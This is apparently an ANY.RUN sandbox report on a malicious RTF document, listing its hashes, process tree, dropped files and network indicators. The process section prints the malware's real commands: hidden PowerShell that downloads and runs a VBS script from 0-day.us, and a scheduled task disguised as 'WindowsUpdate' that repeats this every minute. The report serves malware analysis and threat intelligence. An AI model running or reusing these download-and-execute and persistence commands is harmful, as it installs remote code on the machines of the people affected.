analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

2.doc

Full analysis: https://app.any.run/tasks/a1fe0c1d-2c88-481f-82e6-35328ba66b9e
Verdict: Malicious activity
Analysis date: October 09, 2019, 14:09:27
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

F379111ED445ADE7157ADE15976E76B8

SHA1:

8332CAAAD5B4CFB9A3E576AA0D494A40DE24860C

SHA256:

F7DE2CDBBCDA0F35E2CDFF43DA93301E33F1A655A4EFC9A3B6E560BBA8701340

SSDEEP:

24576:s5Zvp5Zvi5ZvM5Zv05ZvE5Zvl5Zvd5Zvi5ZvE5Zvn:q

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Task Scheduler to run other applications

      • EXCEL.EXE (PID: 3504)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3504)
    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 3504)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2020)
    • Loads the Task Scheduler COM API

      • SchTasks.exe (PID: 968)
  • SUSPICIOUS

    • Executed via COM

      • EXCEL.EXE (PID: 3504)
    • PowerShell script executed

      • Powershell.EXE (PID: 1644)
    • Executed via Task Scheduler

      • Powershell.EXE (PID: 1644)
    • Creates files in the user directory

      • powershell.exe (PID: 3484)
      • Powershell.EXE (PID: 1644)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2824)
      • EXCEL.EXE (PID: 3504)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2824)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

InternalVersionNumber: 86
CharactersWithSpaces: 392
Characters: 335
Words: 58
Pages: 1
TotalEditTime: -
RevisionNumber: 2
ModifyDate: 2018:03:12 22:02:00
CreateDate: 2018:03:12 22:02:00
LastModifiedBy: Windows User
Author: Windows User
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
6
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs excel.exe no specs cmd.exe no specs schtasks.exe no specs powershell.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2824"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3504"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
2020cmd.exe /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://0-day.us/img/2.vbs','%Public%\\svchost325.vbs');Start-Process '%Public%\\svchost325.vbs'C:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
968SchTasks /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR "Powershell -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(\\\"http://0-day.us/img/2.vbs\\\",\\\"$env:public\svchost32.vbs\\\");(New-Object -com Shell.Application).ShellExecute(\\\"$env:public\svchost32.vbs\\\");" /FC:\Windows\system32\SchTasks.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3484powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://0-day.us/img/2.vbs','C:\Users\Public\\svchost325.vbs');Start-Process 'C:\Users\Public\\svchost325.vbs'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1644C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.EXE -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(\"http://0-day.us/img/2.vbs\",\"$env:public\svchost32.vbs\");(New-Object -com Shell.Application).ShellExecute(\"$env:public\svchost32.vbs\");C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.EXE
taskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
919
Read events
710
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2824WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6695.tmp.cvr
MD5:
SHA256:
3504EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR6F01.tmp.cvr
MD5:
SHA256:
3484powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MXD2E1NLH1WYF0FNWBNN.temp
MD5:
SHA256:
1644Powershell.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\88CNW4S89X82EAB9BBME.temp
MD5:
SHA256:
1644Powershell.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:A272B20D1454EFE23A324E582F0E701D
SHA256:68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051
3484powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:A272B20D1454EFE23A324E582F0E701D
SHA256:68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051
3484powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF187589.TMPbinary
MD5:A272B20D1454EFE23A324E582F0E701D
SHA256:68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051
1644Powershell.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF189c99.TMPbinary
MD5:A272B20D1454EFE23A324E582F0E701D
SHA256:68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051
2824WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:39FB5468FDA3B01BD0E9143BDDE1AD47
SHA256:393278A7DB63645C7F839369F8814CEAEDDF2A87EF1F1DF0F612F76CA6BCDF91
2824WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BDE3EE41.emfemf
MD5:6AE8648267F97208E8A7FD6FF41023B4
SHA256:BE0087ECD00186B38B8DFA380E51AF7568185B3553835C8FD405793AB69657B1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1644
Powershell.EXE
GET
302
103.224.212.222:80
http://0-day.us/img/2.vbs
AU
malicious
1644
Powershell.EXE
GET
403
185.53.179.29:80
http://ww38.0-day.us/img/2.vbs
DE
html
162 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1644
Powershell.EXE
185.53.179.29:80
ww38.0-day.us
Team Internet AG
DE
malicious
3484
powershell.exe
103.224.212.222:80
0-day.us
Trellian Pty. Limited
AU
malicious
1644
Powershell.EXE
103.224.212.222:80
0-day.us
Trellian Pty. Limited
AU
malicious

DNS requests

Domain
IP
Reputation
0-day.us
  • 103.224.212.222
malicious
ww38.0-day.us
  • 185.53.179.29
malicious

Threats

Found threats are available for the paid subscriptions
2 ETPRO signatures available at the full report
No debug info